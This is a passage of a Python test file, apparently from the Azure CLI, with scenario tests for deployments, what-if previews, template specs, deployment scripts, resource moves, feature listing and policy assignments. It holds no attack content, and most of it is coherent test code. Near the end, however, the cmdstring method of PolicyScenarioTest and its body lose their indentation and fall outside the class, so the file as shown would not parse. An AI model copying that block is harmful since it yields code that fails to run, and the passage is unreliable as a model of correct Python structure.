        paths, and cancelling a --no-wait deployment."""
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        self.kwargs.update({
            'tf': os.path.join(curr_dir, 'test-template.json').replace('\\', '\\\\'),
            'tf_invalid': os.path.join(curr_dir, 'simple_deploy_invalid.json').replace('\\', '\\\\'),
            'params': os.path.join(curr_dir, 'test-params.json').replace('\\', '\\\\'),
            'error_params': os.path.join(curr_dir, 'test-error-params.json').replace('\\', '\\\\'),
            'params_invalid': os.path.join(curr_dir, 'simple_deploy_parameters_invalid.json').replace('\\', '\\\\'),
            # params-uri below is the raw file url of the test_params.json above
            'params_uri': 'https://raw.githubusercontent.com/Azure/azure-cli/dev/src/azure-cli/azure/cli/command_modules/resource/tests/latest/test-params.json',
            'of': os.path.join(curr_dir, 'test-object.json').replace('\\', '\\\\'),
            'dn': 'azure-cli-deployment',
            'dn2': self.create_random_name('azure-cli-resource-group-deployment2', 60)
        })
        # The template needs an existing subnet to wire the load balancer into.
        self.kwargs['subnet_id'] = self.cmd('network vnet create -g {rg} -n vnet1 --subnet-name subnet1').get_output_in_json()['newVNet']['subnets'][0]['id']

        self.cmd('group deployment validate -g {rg} --template-file "{tf}" --parameters @"{params}" --parameters subnetId="{subnet_id}" --parameters backendAddressPools=@"{of}"', checks=[
            self.check('properties.provisioningState', 'Succeeded')
        ])
        self.cmd('group deployment validate -g {rg} --template-file "{tf}" --parameters "{params_uri}" --parameters subnetId="{subnet_id}" --parameters backendAddressPools=@"{of}"', checks=[
            self.check('properties.provisioningState', 'Succeeded')
        ])
        # Bad parameter values must fail validation.
        with self.assertRaises(CLIError):
            self.cmd('group deployment validate -g {rg} --template-file "{tf}" --parameters @"{error_params}" --parameters subnetId="{subnet_id}" --parameters backendAddressPools=@"{of}"')

        self.cmd('group deployment create -g {rg} -n {dn} --template-file "{tf}" --parameters @"{params}" --parameters subnetId="{subnet_id}" --parameters backendAddressPools=@"{of}"', checks=[
            self.check('properties.provisioningState', 'Succeeded'),
            self.check('resourceGroup', '{rg}')
        ])
        self.cmd('network lb show -g {rg} -n test-lb',
                 checks=self.check('tags', {'key': 'super=value'}))
        self.cmd('group deployment list -g {rg}', checks=[
            self.check('[0].name', '{dn}'),
            self.check('[0].resourceGroup', '{rg}')
        ])
        self.cmd('group deployment list -g {rg} --filter "provisioningState eq \'Succeeded\'"', checks=[
            self.check('[0].name', '{dn}'),
            self.check('[0].resourceGroup', '{rg}')
        ])
        self.cmd('group deployment show -g {rg} -n {dn}', checks=[
            self.check('name', '{dn}'),
            self.check('resourceGroup', '{rg}')
        ])
        self.cmd('group deployment operation list -g {rg} -n {dn}', checks=[
            self.check('length([])', 2),
            self.check('[0].resourceGroup', '{rg}')
        ])

        json_invalid_info = "Failed to parse '{}', please check whether it is a valid JSON format"

        def assert_json_parse_error(err, path_key):
            # BUGFIX: the original asserts compared the message against the
            # exception *object* (always False) and formatted in the literal
            # placeholder (e.g. '{tf_invalid}') instead of the real path.
            # kwargs store backslashes doubled for command formatting; undo
            # that before matching against the raw exception text.
            real_path = self.kwargs[path_key].replace('\\\\', '\\')
            self.assertIn(json_invalid_info.format(real_path), str(err.exception))

        # Invalid JSON in the template or the parameter file must surface a
        # parse error naming the offending file.
        with self.assertRaises(CLIError) as err:
            self.cmd('group deployment validate -g {rg} -f "{tf_invalid}" -p @"{params}"')
        assert_json_parse_error(err, 'tf_invalid')
        with self.assertRaises(CLIError) as err:
            self.cmd('group deployment validate -g {rg} -f "{tf}" -p @"{params_invalid}"')
        assert_json_parse_error(err, 'params_invalid')
        with self.assertRaises(CLIError) as err:
            self.cmd('group deployment create -g {rg} -n {dn} -f "{tf_invalid}" -p @"{params}"')
        assert_json_parse_error(err, 'tf_invalid')
        with self.assertRaises(CLIError) as err:
            self.cmd('group deployment create -g {rg} -n {dn} -f "{tf}" -p @"{params_invalid}"')
        assert_json_parse_error(err, 'params_invalid')

        # Start a second deployment without waiting, then cancel it.
        self.cmd('group deployment create -g {rg} -n {dn2} --template-file "{tf}" --parameters @"{params}" --parameters subnetId="{subnet_id}" --parameters backendAddressPools=@"{of}" --no-wait')
        self.cmd('group deployment cancel -n {dn2} -g {rg}')
        self.cmd('group deployment show -n {dn2} -g {rg}', checks=[
            self.check('properties.provisioningState', 'Canceled')
        ])

    @ResourceGroupPreparer(name_prefix='cli_test_deployment_with_large_params')
    @AllowLargeResponse()
    def test_group_deployment_with_large_params(self, resource_group):
        """Large template/parameter payloads deploy via both @file and bare-file syntax."""
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        self.kwargs.update({
            'large_tf': os.path.join(curr_dir, 'test-largesize-template.json').replace('\\', '\\\\'),
            'large_params': os.path.join(curr_dir, 'test-largesize-parameters.json').replace('\\', '\\\\'),
            'app_name': self.create_random_name('cli', 30)
        })
        self.cmd('group deployment validate -g {rg} --template-file "{large_tf}" --parameters @"{large_params}"', checks=[
            self.check('properties.provisioningState', 'Succeeded')
        ])
        self.cmd('group deployment validate -g {rg} --template-file "{large_tf}" --parameters "{large_params}"', checks=[
            self.check('properties.provisioningState', 'Succeeded')
        ])
        self.cmd('group deployment create -g {rg} --template-file "{large_tf}" --parameters @"{large_params}" --parameters function-app-name="{app_name}"', checks=[
            self.check('properties.provisioningState', 'Succeeded'),
            self.check('resourceGroup', '{rg}')
        ])
        self.cmd('group deployment create -g {rg} --template-file "{large_tf}" --parameters "{large_params}" --parameters function-app-name="{app_name}"', checks=[
            self.check('properties.provisioningState', 'Succeeded'),
            self.check('resourceGroup', '{rg}')
        ])

    @ResourceGroupPreparer(name_prefix='cli_test_on_error_deployment_lastsuccessful')
    def test_group_on_error_deployment_lastsuccessful(self, resource_group):
        """--rollback-on-error without an argument records the last successful deployment."""
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        self.kwargs.update({
            'tf': os.path.join(curr_dir, 'test-template-lite.json').replace('\\', '\\\\'),
            'dn': self.create_random_name('azure-cli-deployment', 30),
            'onErrorType': 'LastSuccessful',
            'sdn': self.create_random_name('azure-cli-deployment', 30)
        })
        self.cmd('group deployment create -g {rg} -n {dn} --template-file "{tf}"', checks=[
            self.check('properties.provisioningState', 'Succeeded'),
            self.check('resourceGroup', '{rg}'),
            self.check('properties.onErrorDeployment', None)
        ])
        self.cmd('group deployment create -g {rg} -n {sdn} --template-file "{tf}" --rollback-on-error', checks=[
            self.check('properties.provisioningState', 'Succeeded'),
            self.check('resourceGroup', '{rg}'),
            self.check('properties.onErrorDeployment.deploymentName', '{dn}'),
            self.check('properties.onErrorDeployment.type', '{onErrorType}')
        ])

    @ResourceGroupPreparer(name_prefix='cli_test_on_error_deployment_specificdeployment')
    def test_group_on_error_deployment_specificdeployment(self, resource_group):
        """--rollback-on-error with a name records that specific deployment as the fallback."""
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        self.kwargs.update({
            'tf': os.path.join(curr_dir, 'test-template-lite.json').replace('\\', '\\\\'),
            'dn': self.create_random_name('azure-cli-deployment', 30),
            'onErrorType': 'SpecificDeployment',
            'sdn': self.create_random_name('azure-cli-deployment', 30)
        })
        self.cmd('group deployment create -g {rg} -n {dn} --template-file "{tf}"', checks=[
            self.check('properties.provisioningState', 'Succeeded'),
            self.check('resourceGroup', '{rg}'),
            self.check('properties.onErrorDeployment', None)
        ])
        self.cmd('group deployment create -g {rg} -n {sdn} --template-file "{tf}" --rollback-on-error {dn}', checks=[
            self.check('properties.provisioningState', 'Succeeded'),
            self.check('resourceGroup', '{rg}'),
            self.check('properties.onErrorDeployment.deploymentName', '{dn}'),
            self.check('properties.onErrorDeployment.type', '{onErrorType}')
        ])
class DeploymentLiveTest(LiveScenarioTest):
    @ResourceGroupPreparer()
    def test_group_deployment_progress(self, resource_group):
        """Deploying with --verbose must stream per-resource progress lines of
        the form "<Status>: <name> (<type>)"."""
        from azure.cli.testsdk.utilities import force_progress_logging
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        self.kwargs.update({
            'tf': os.path.join(curr_dir, 'test-template.json').replace('\\', '\\\\'),
            'params': os.path.join(curr_dir, 'test-params.json').replace('\\', '\\\\'),
            'of': os.path.join(curr_dir, 'test-object.json').replace('\\', '\\\\'),
            'dn': 'azure-cli-deployment2'
        })
        self.kwargs['subnet_id'] = self.cmd('network vnet create -g {rg} -n vnet1 --subnet-name subnet1').get_output_in_json()['newVNet']['subnets'][0]['id']
        with force_progress_logging() as test_io:
            self.cmd('group deployment create --verbose -g {rg} -n {dn} --template-file "{tf}" --parameters @"{params}" --parameters subnetId="{subnet_id}" --parameters backendAddressPools=@"{of}"')

        # verify the progress output
        lines = test_io.getvalue().splitlines()
        for line in lines:
            # every progress line starts with its status token
            self.assertIn(line.split(':')[0], ['Accepted', 'Succeeded'])
        # BUGFIX: this was assertTrue(<non-empty string>, lines), which always
        # passed (the list was treated as the failure message). The intent is
        # to assert the final success line for the deployment is present.
        self.assertIn('Succeeded: {} (Microsoft.Resources/deployments)'.format(self.kwargs['dn']), lines)
class DeploymentNoWaitTest(ScenarioTest):
    @ResourceGroupPreparer(name_prefix='cli_test_group_deployment_no_wait')
    def test_group_deployment_no_wait(self, resource_group):
        """Fire a deployment with --no-wait, block on `wait --created`, then confirm success."""
        template_dir = os.path.dirname(os.path.realpath(__file__))
        self.kwargs.update({
            'tf': os.path.join(template_dir, 'simple_deploy.json').replace('\\', '\\\\'),
            'params': os.path.join(template_dir, 'simple_deploy_parameters.json').replace('\\', '\\\\'),
            'dn': 'azure-cli-deployment'
        })

        # --no-wait returns before provisioning completes, so the output is empty.
        self.cmd('group deployment create -g {rg} -n {dn} --template-file "{tf}" --parameters @"{params}" --no-wait',
                 checks=self.is_empty())

        # Block until the deployment is created...
        self.cmd('group deployment wait -g {rg} -n {dn} --created',
                 checks=self.is_empty())

        # ...and verify it ultimately provisioned successfully.
        self.cmd('group deployment show -g {rg} -n {dn}',
                 checks=self.check('properties.provisioningState', 'Succeeded'))
class DeploymentThruUriTest(ScenarioTest):
    @ResourceGroupPreparer(name_prefix='cli_test_deployment_uri')
    def test_group_deployment_thru_uri(self, resource_group):
        """Deploy from a remote template URI through both the legacy
        `group deployment` and the newer `deployment group` command groups."""
        self.resource_group = resource_group
        param_dir = os.path.dirname(os.path.realpath(__file__))
        # Same copy of the sample template under the current folder, but fetched by URI.
        self.kwargs.update({
            'tf': 'https://raw.githubusercontent.com/Azure/azure-cli/dev/src/azure-cli/azure/cli/command_modules/resource/tests/latest/simple_deploy.json',
            'params': os.path.join(param_dir, 'simple_deploy_parameters.json').replace('\\', '\\\\')
        })

        # Both command groups must behave identically for URI-based deployments.
        for prefix in ('group deployment', 'deployment group'):
            created = self.cmd(prefix + ' create -g {rg} --template-uri "{tf}" --parameters @"{params}"', checks=[
                self.check('properties.provisioningState', 'Succeeded'),
                self.check('resourceGroup', '{rg}'),
                self.check('properties.templateLink.uri', '{tf}'),
            ]).get_output_in_json()
            self.kwargs['dn'] = created['name']

            self.cmd(prefix + ' show -g {rg} -n {dn}',
                     checks=self.check('name', '{dn}'))
            self.cmd(prefix + ' delete -g {rg} -n {dn}')
            self.cmd(prefix + ' list -g {rg}',
                     checks=self.is_empty())
class DeploymentWhatIfAtResourceGroupScopeTest(ScenarioTest):
    @ResourceGroupPreparer(name_prefix='cli_test_deployment_what_if')
    def test_resource_group_level_what_if(self):
        """What-if at resource-group scope should report the SKU change on an
        already-deployed storage account as a Modify."""
        template_dir = os.path.dirname(os.path.realpath(__file__))
        self.kwargs.update({
            'tf': os.path.join(template_dir, 'storage_account_deploy.json').replace('\\', '\\\\'),
            'params': os.path.join(template_dir, 'storage_account_deploy_parameters.json').replace('\\', '\\\\'),
        })

        # Deploy once for real so what-if has an existing resource to diff against.
        initial = self.cmd('deployment group create --resource-group {rg} --template-file "{tf}"').get_output_in_json()
        self.kwargs['storage_account_id'] = initial['properties']['outputs']['storageAccountId']['value']

        # The parameter file flips the SKU, so what-if must surface a Modify on sku.name.
        sku_delta = "changes[?resourceId == '{storage_account_id}'] | [0].delta[?path == 'sku.name'] | [0]"
        self.cmd('deployment group what-if --resource-group {rg} --template-file "{tf}" --parameters "{params}" --no-pretty-print', checks=[
            self.check('status', 'Succeeded'),
            self.check("changes[?resourceId == '{storage_account_id}'].changeType | [0]", 'Modify'),
            self.check(sku_delta + '.propertyChangeType', 'Modify'),
            self.check(sku_delta + '.before', 'Standard_LRS'),
            self.check(sku_delta + '.after', 'Standard_GRS')
        ])
class DeploymentWhatIfAtSubscriptionScopeTest(ScenarioTest):
    def test_subscription_level_what_if(self):
        """What-if at subscription scope should report the policy-rule location change."""
        template_dir = os.path.dirname(os.path.realpath(__file__))
        self.kwargs.update({
            'tf': os.path.join(template_dir, 'policy_definition_deploy.json').replace('\\', '\\\\'),
            'params': os.path.join(template_dir, 'policy_definition_deploy_parameters.json').replace('\\', '\\\\'),
        })

        # Deploy the policy definition first so what-if has something to diff.
        initial = self.cmd('deployment sub create --location westus --template-file "{tf}"').get_output_in_json()
        self.kwargs['policy_definition_id'] = initial['properties']['outputs']['policyDefinitionId']['value']

        # The parameter file changes the rule's matched location, so expect a Modify.
        rule_delta = "changes[?resourceId == '{policy_definition_id}'] | [0].delta[?path == 'properties.policyRule.if.equals'] | [0]"
        self.cmd('deployment sub what-if --location westus --template-file "{tf}" --parameters "{params}" --no-pretty-print', checks=[
            self.check('status', 'Succeeded'),
            self.check("changes[?resourceId == '{policy_definition_id}'].changeType | [0]", 'Modify'),
            self.check(rule_delta + '.propertyChangeType', 'Modify'),
            self.check(rule_delta + '.before', 'northeurope'),
            self.check(rule_delta + '.after', 'westeurope'),
        ])
class DeploymentWhatIfAtManagementGroupTest(ScenarioTest):
    def test_management_group_level_what_if(self):
        """What-if at management-group scope: a fresh template yields four Create changes."""
        template_dir = os.path.dirname(os.path.realpath(__file__))
        self.kwargs.update({
            'tf': os.path.join(template_dir, 'management_group_level_template.json').replace('\\', '\\\\'),
            'params': os.path.join(template_dir, 'management_group_level_parameters.json').replace('\\', '\\\\'),
            'dn': self.create_random_name('azure-cli-management-group-deployment', 60),
            'mg': self.create_random_name('azure-cli-management', 30),
            'sub-rg': self.create_random_name('azure-cli-sub-resource-group', 60),
            'storage-account-name': self.create_random_name('armbuilddemo', 20)
        })
        self.cmd('account management-group create --name {mg}', checks=[])

        # Nothing exists yet, so every change reported by what-if must be a Create.
        expected = [
            self.check('status', 'Succeeded'),
            self.check('length(changes)', 4),
        ]
        expected.extend(self.check('changes[{}].changeType'.format(i), 'Create') for i in range(4))

        self.cmd('deployment mg what-if --management-group-id {mg} --location WestUS --template-file "{tf}" --no-pretty-print '
                 '--parameters @"{params}" --parameters targetMG="{mg}" --parameters nestedRG="{sub-rg}" '
                 '--parameters storageAccountName="{storage-account-name}"',
                 checks=expected)
class DeploymentWhatIfAtTenantScopeTest(ScenarioTest):
    def test_tenant_level_what_if(self):
        """What-if at tenant scope: a fresh template yields three Create changes."""
        template_dir = os.path.dirname(os.path.realpath(__file__))
        self.kwargs.update({
            'tf': os.path.join(template_dir, 'tenant_level_template.json').replace('\\', '\\\\'),
            'dn': self.create_random_name('azure-cli-tenant-level-deployment', 60),
            'mg': self.create_random_name('azure-cli-management-group', 40),
        })
        self.cmd('account management-group create --name {mg}', checks=[])

        # Nothing is deployed yet, so each reported change must be a Create.
        expected = [
            self.check('status', 'Succeeded'),
            self.check('length(changes)', 3),
        ]
        expected.extend(self.check('changes[{}].changeType'.format(i), 'Create') for i in range(3))

        self.cmd('deployment tenant what-if --location WestUS --template-file "{tf}" --parameters targetMG="{mg}" --no-pretty-print',
                 checks=expected)
class DeploymentWhatIfTestWithTemplateSpecs(ScenarioTest):
    @ResourceGroupPreparer(name_prefix='cli_test_deployment_what_if_template_specs', location='westus')
    def test_resource_group_level_what_if_ts(self, resource_group, resource_group_location):
        """What-if against a template spec at resource-group scope reports the storage SKU change."""
        test_dir = os.path.dirname(os.path.realpath(__file__))
        spec_name = self.create_random_name('cli-test-deploy-what-if-rg-deploy', 60)
        self.kwargs.update({
            'template_spec_name': spec_name,
            'resource_group_location': resource_group_location,
            'tf': os.path.join(test_dir, 'storage_account_deploy.json').replace('\\', '\\\\'),
            'params': os.path.join(test_dir, 'storage_account_deploy_parameters.json').replace('\\', '\\\\'),
        })

        # Publish the template as a template spec and remember the version id.
        spec = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}"').get_output_in_json()
        self.kwargs['template_spec_version_id'] = spec['id']

        # Deploy once so what-if has an existing storage account to diff.
        deployed = self.cmd('deployment group create --resource-group {rg} --template-spec "{template_spec_version_id}"').get_output_in_json()
        self.kwargs['storage_account_id'] = deployed['properties']['outputs']['storageAccountId']['value']

        sku_delta = "changes[?resourceId == '{storage_account_id}'] | [0].delta[?path == 'sku.name'] | [0]"
        self.cmd('deployment group what-if --resource-group {rg} --template-spec "{template_spec_version_id}" --parameters "{params}" --no-pretty-print', checks=[
            self.check('status', 'Succeeded'),
            self.check("changes[?resourceId == '{storage_account_id}'].changeType | [0]", 'Modify'),
            self.check(sku_delta + '.propertyChangeType', 'Modify'),
            self.check(sku_delta + '.before', 'Standard_LRS'),
            self.check(sku_delta + '.after', 'Standard_GRS')
        ])

    @ResourceGroupPreparer(name_prefix='cli_test_deployment_what_if_template_specs', location='westus')
    def test_subscription_level_what_if_ts(self, resource_group, resource_group_location):
        """What-if against a template spec at subscription scope reports the policy-rule change."""
        test_dir = os.path.dirname(os.path.realpath(__file__))
        spec_name = self.create_random_name('cli-test-deploy-what-if-sub-deploy', 60)
        self.kwargs.update({
            'template_spec_name': spec_name,
            'resource_group_location': resource_group_location,
            'tf': os.path.join(test_dir, 'policy_definition_deploy.json').replace('\\', '\\\\'),
            'params': os.path.join(test_dir, 'policy_definition_deploy_parameters.json').replace('\\', '\\\\'),
        })

        # Publish the template as a template spec and remember the version id.
        spec = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}"').get_output_in_json()
        self.kwargs['template_spec_version_id'] = spec['id']

        # Deploy once so what-if has an existing policy definition to diff.
        deployed = self.cmd('deployment sub create --location westus --template-spec {template_spec_version_id}').get_output_in_json()
        self.kwargs['policy_definition_id'] = deployed['properties']['outputs']['policyDefinitionId']['value']

        rule_delta = "changes[?resourceId == '{policy_definition_id}'] | [0].delta[?path == 'properties.policyRule.if.equals'] | [0]"
        self.cmd('deployment sub what-if --location westus --template-spec {template_spec_version_id} --parameters "{params}" --no-pretty-print', checks=[
            self.check('status', 'Succeeded'),
            self.check("changes[?resourceId == '{policy_definition_id}'].changeType | [0]", 'Modify'),
            self.check(rule_delta + '.propertyChangeType', 'Modify'),
            self.check(rule_delta + '.before', 'northeurope'),
            self.check(rule_delta + '.after', 'westeurope'),
        ])
class DeploymentScriptsTest(ScenarioTest):
    """CRUD coverage for `deployment-scripts`. All four tests deploy the same
    template; the duplicated staging/deploy steps are factored into helpers."""

    def _stage_script_kwargs(self, resource_group):
        # Shared fixture: seed self.kwargs with fresh random names and the template path.
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        self.kwargs.update({
            'deployment_script_name': self.create_random_name('script', 20),
            'deployment_name': self.create_random_name('ds', 20),
            'resource_group': resource_group,
            'template_file': os.path.join(curr_dir, 'deployment-scripts-deploy.json').replace('\\', '\\\\'),
        })

    def _create_deployment_script(self):
        # Deploy the template that provisions the deployment-script resource.
        self.cmd('deployment group create -g {resource_group} -n {deployment_name} --template-file "{template_file}" --parameters scriptName={deployment_script_name}', checks=[
            self.check('properties.provisioningState', 'Succeeded'),
            self.check('resourceGroup', '{resource_group}'),
        ])

    @ResourceGroupPreparer(name_prefix='cli_test_deployment_scripts', location='brazilsouth')
    def test_list_all_deployment_scripts(self, resource_group):
        """`deployment-scripts list` picks up a newly created script."""
        self._stage_script_kwargs(resource_group)
        count = 0
        self.cmd('deployment-scripts list',
                 checks=self.check("length([?name=='{deployment_script_name}'])", count))
        self._create_deployment_script()
        count += 1
        self.cmd('deployment-scripts list',
                 checks=self.check("length([?name=='{deployment_script_name}'])", count))

    @ResourceGroupPreparer(name_prefix='cli_test_deployment_scripts', location='brazilsouth')
    def test_show_deployment_script(self, resource_group):
        """`deployment-scripts show` returns the script by name."""
        self._stage_script_kwargs(resource_group)
        self._create_deployment_script()
        self.cmd("deployment-scripts show --resource-group {resource_group} --name {deployment_script_name}",
                 checks=self.check('name', '{deployment_script_name}'))

    @ResourceGroupPreparer(name_prefix='cli_test_deployment_scripts', location='brazilsouth')
    def test_show_deployment_script_logs(self, resource_group):
        """`deployment-scripts show-log` returns a log payload with a value field."""
        self._stage_script_kwargs(resource_group)
        self._create_deployment_script()
        deployment_script_logs = self.cmd("deployment-scripts show-log --resource-group {resource_group} --name {deployment_script_name}").get_output_in_json()
        self.assertIsNotNone(deployment_script_logs['value'])

    @ResourceGroupPreparer(name_prefix='cli_test_deployment_scripts', location='brazilsouth')
    def test_delete_deployment_script(self, resource_group):
        """`deployment-scripts delete` removes the script from list results."""
        self._stage_script_kwargs(resource_group)
        self._create_deployment_script()
        # making sure it exists first
        self.cmd("deployment-scripts show --resource-group {resource_group} --name {deployment_script_name}",
                 checks=self.check('name', '{deployment_script_name}'))
        self.cmd("deployment-scripts delete --resource-group {resource_group} --name {deployment_script_name} --yes")
        self.cmd('deployment-scripts list',
                 checks=self.check("length([?name=='{deployment_script_name}'])", 0))
class DeploymentTestAtSubscriptionScopeTemplateSpecs(ScenarioTest):
    @AllowLargeResponse(4096)
    @ResourceGroupPreparer(name_prefix='cli_test_template_specs_tenant_deploy', location='eastus')
    def test_subscription_level_deployment_ts(self, resource_group, resource_group_location):
        """Subscription-scope deployments sourced from a template spec:
        validate, create, show, export, operations, cancel, then delete the spec."""
        curr_dir = os.path.dirname(os.path.realpath(__file__))
        template_spec_name = self.create_random_name('cli-test-sub-lvl-ts-deploy', 60)
        self.kwargs.update({
            'template_spec_name': template_spec_name,
            'resource_group_location': resource_group_location,
            'tf': os.path.join(curr_dir, 'subscription_level_template.json').replace('\\', '\\\\'),
            'params': os.path.join(curr_dir, 'subscription_level_parameters.json').replace('\\', '\\\\'),
            # params-uri below is the raw file url of the subscription_level_parameters.json above
            'params_uri': 'https://raw.githubusercontent.com/Azure/azure-cli/dev/src/azure-cli/azure/cli/command_modules/resource/tests/latest/subscription_level_parameters.json',
            'dn': self.create_random_name('azure-cli-subscription_level_deployment', 60),
            'dn2': self.create_random_name('azure-cli-subscription_level_deployment', 60),
            'storage-account-name': self.create_random_name('armbuilddemo', 20)
        })
        # Publish the template as version 1.0 of a new template spec.
        result = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}"',
                          checks=self.check('name', '1.0')).get_output_in_json()
        self.kwargs['template_spec_version_id'] = result['id']

        self.cmd('deployment sub validate --location WestUS --template-spec {template_spec_version_id} --parameters "{params_uri}" --parameters storageAccountName="{storage-account-name}"', checks=[
            self.check('properties.provisioningState', 'Succeeded')
        ])
        self.cmd('deployment sub create -n {dn} --location WestUS --template-spec {template_spec_version_id} --parameters @"{params}" --parameters storageAccountName="{storage-account-name}"', checks=[
            self.check('properties.provisioningState', 'Succeeded')
        ])
        self.cmd('deployment sub show -n {dn}', checks=[
            self.check('name', '{dn}')
        ])
        self.cmd('deployment sub export -n {dn}', checks=[
        ])
        self.cmd('deployment operation sub list -n {dn}', checks=[
            self.check('length([])', 5)
        ])
        # Start a second deployment without waiting and cancel it.
        self.cmd('deployment sub create -n {dn2} --location WestUS --template-spec "{template_spec_version_id}" --parameters @"{params}" --no-wait')
        self.cmd('deployment sub cancel -n {dn2}')
        self.cmd('deployment sub show -n {dn2}', checks=[
            self.check('properties.provisioningState', 'Canceled')
        ])

        # clean up: derive the parent template-spec id from the version id.
        # BUGFIX: the version suffix used to be replaced with ' ' (a stray
        # space), embedding a trailing blank in the resource id.
        self.kwargs['template_spec_id'] = result['id'].replace('/versions/1.0', '')
        self.cmd('ts delete --template-spec {template_spec_id} --yes')
class DeploymentTestAtResourceGroupTemplateSpecs(ScenarioTest):
    @ResourceGroupPreparer(name_prefix='cli_test_template_specs_resource_group_deployment', location='westus')
    def test_resource_group_deployment_ts(self, resource_group, resource_group_location):
        """Resource-group deployments sourced from a template spec: validate,
        create, list/show/export/operations, then cancel a --no-wait deployment."""
        test_dir = os.path.dirname(os.path.realpath(__file__))
        spec_name = self.create_random_name('cli-test-resource-group-ts-deploy', 60)
        self.kwargs.update({
            'template_spec_name': spec_name,
            'resource_group_location': resource_group_location,
            'tf': os.path.join(test_dir, 'simple_deploy.json').replace('\\', '\\\\'),
            'params': os.path.join(test_dir, 'simple_deploy_parameters.json').replace('\\', '\\\\'),
            'dn': self.create_random_name('azure-cli-resource-group-deployment', 60),
            'dn2': self.create_random_name('azure-cli-resource-group-deployment', 60),
        })

        # Publish the template as version 1.0 of a new template spec.
        spec = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}"',
                        checks=self.check('name', '1.0')).get_output_in_json()
        self.kwargs['template_spec_version_id'] = spec['id']

        self.cmd('deployment group validate --resource-group {rg} --template-spec "{template_spec_version_id}" --parameters @"{params}"',
                 checks=self.check('properties.provisioningState', 'Succeeded'))
        self.cmd('deployment group create --resource-group {rg} -n {dn} --template-spec "{template_spec_version_id}" --parameters @"{params}"',
                 checks=self.check('properties.provisioningState', 'Succeeded'))

        # The deployment must be discoverable with and without an OData filter.
        self.cmd('deployment group list --resource-group {rg}',
                 checks=self.check('[0].name', '{dn}'))
        self.cmd('deployment group list --resource-group {rg} --filter "provisioningState eq \'Succeeded\'"',
                 checks=self.check('[0].name', '{dn}'))
        self.cmd('deployment group show --resource-group {rg} -n {dn}',
                 checks=self.check('name', '{dn}'))
        self.cmd('deployment group export --resource-group {rg} -n {dn}', checks=[])
        self.cmd('deployment operation group list --resource-group {rg} -n {dn}',
                 checks=self.check('length([])', 2))

        # Start a second deployment without waiting and cancel it.
        self.cmd('deployment group create --resource-group {rg} -n {dn2} --template-spec "{template_spec_version_id}" --parameters @"{params}" --no-wait')
        self.cmd('deployment group cancel -n {dn2} -g {rg}')
        self.cmd('deployment group show -n {dn2} -g {rg}',
                 checks=self.check('properties.provisioningState', 'Canceled'))
class ResourceMoveScenarioTest(ScenarioTest):
    @ResourceGroupPreparer(name_prefix='cli_test_resource_move_dest', parameter_name='resource_group_dest', key='rg2')
    @ResourceGroupPreparer(name_prefix='cli_test_resource_move_source', key='rg1')
    def test_resource_move(self, resource_group, resource_group_dest):
        """Move two NSGs from the source resource group to the destination and verify."""
        self.kwargs.update({
            'nsg1': self.create_random_name('nsg-move', 20),
            'nsg2': self.create_random_name('nsg-move', 20)
        })

        # Create both NSGs in the source group and capture their resource ids.
        for nsg_key in ('nsg1', 'nsg2'):
            created = self.cmd('network nsg create -n {%s} -g {rg1}' % nsg_key).get_output_in_json()
            self.kwargs[nsg_key + '_id'] = created['NewNSG']['id']

        self.cmd('resource move --ids {nsg1_id} {nsg2_id} --destination-group {rg2}')

        # Both NSGs must now resolve in the destination group.
        self.cmd('network nsg show -g {rg2} -n {nsg1}',
                 checks=self.check('name', '{nsg1}'))
        self.cmd('network nsg show -g {rg2} -n {nsg2}',
                 checks=self.check('name', '{nsg2}'))
class FeatureScenarioTest(ScenarioTest):
    @AllowLargeResponse(8192)
    def test_feature_list(self):
        """Feature listing works globally, per-namespace, and for a single feature."""
        self.cmd('feature list',
                 checks=self.check("length([?name=='Microsoft.Xrm/uxdevelopment'])", 1))
        self.cmd('feature list --namespace Microsoft.Network',
                 checks=self.check("length([?name=='Microsoft.Network/SkipPseudoVipGeneration'])", 1))
        # Once a feature goes GA it is removed from the feature list. If that
        # happens to this one, swap in another preview feature for the test.
        self.cmd('feature show --namespace Microsoft.Network -n AllowLBPreview')

    @AllowLargeResponse(8192)
    def test_feature_unregister(self):
        """Unregistering flips the feature into an unregistering/unregistered state."""
        self.cmd('feature unregister --namespace Microsoft.Network --name AllowLBPreview',
                 checks=self.check_pattern('properties.state', 'Unregistering|Unregistered'))
class PolicyScenarioTest(ScenarioTest):
def cmdstring(self, basic, management_group=None, subscription=None):
cmd = basic
if (management_group):
cmd = cmd + ' --management-group {mg}'
if (subscription):
cmd = cmd + ' --subscription {sub}'
return cmd
    def applyPolicy(self):
        """Exercise policy-assignment create/list/delete at resource-group scope.

        Relies on self.kwargs already containing 'pn' (policy definition name),
        'rg' and 'params' — populated by the calling test before this helper runs.
        """
        # create a policy assignment on a resource group
        self.kwargs.update({
            'pan': self.create_random_name('azurecli-test-policy-assignment', 40),
            'padn': self.create_random_name('test_assignment', 20)
        })
        self.cmd('policy assignment create --policy {pn} -n {pan} --display-name {padn} -g {rg} --params "{params}"', checks=[
            self.check('name', '{pan}'),
            self.check('displayName', '{padn}'),
            self.check('sku.name', 'A0'),
            self.check('sku.tier', 'Free')
        ])
        # create a policy assignment with not scopes and standard sku
        self.kwargs.update({
            'vnet': self.create_random_name('azurecli-test-policy-vnet', 40),
            'subnet': self.create_random_name('azurecli-test-policy-subnet', 40),
            'sub': self.get_subscription_id()
        })
        self.cmd('network vnet create -g {rg} -n {vnet} --subnet-name {subnet}')
        # Build the notScopes resource path from the kwargs gathered above.
        self.kwargs['notscope'] = '/subscriptions/{sub}/resourceGroups/{rg}/providers/Microsoft.Network/virtualNetworks'.format(**self.kwargs)
        self.cmd('policy assignment create --policy {pn} -n {pan} --display-name {padn} -g {rg} --not-scopes {notscope} --params "{params}" --sku standard', checks=[
            self.check('name', '{pan}'),
            self.check('displayName', '{padn}'),
            self.check('sku.name', 'A1'),
            self.check('sku.tier', 'Standard'),
            self.check('notScopes[0]', '{notscope}')
        ])
